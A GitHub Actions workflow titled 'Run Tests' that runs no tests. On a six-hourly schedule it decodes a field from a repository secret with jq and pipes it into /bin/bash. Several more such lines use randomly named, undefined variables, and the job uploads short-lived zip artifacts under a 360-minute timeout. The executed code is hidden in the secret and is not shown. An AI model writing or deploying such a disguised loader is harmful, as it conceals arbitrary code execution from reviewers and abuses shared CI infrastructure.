name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '11 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          zxm519: ${{ secrets.zxm519 }}
        run: |
          printf '%s' "$zxm519" | jq -r .nsx21740 | /bin/bash
          printf '%s' "$j78602" | jq -r .uuvkd00 | /bin/bash
          echo $g9 | jq -r .hz77 | /bin/bash
          printf '%s' "$rdnpv575" | jq -r .svpw0993 | /bin/bash
          printf '%s' "$goue7657" | jq -r .sto47148 | /bin/bash
          echo $niw57 | jq -r .wxz5483 | /bin/bash
          printf '%s' "$hwr371" | jq -r .etuh40 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 6lb19K4p
          path: "*.zip"
          retention-days: 1
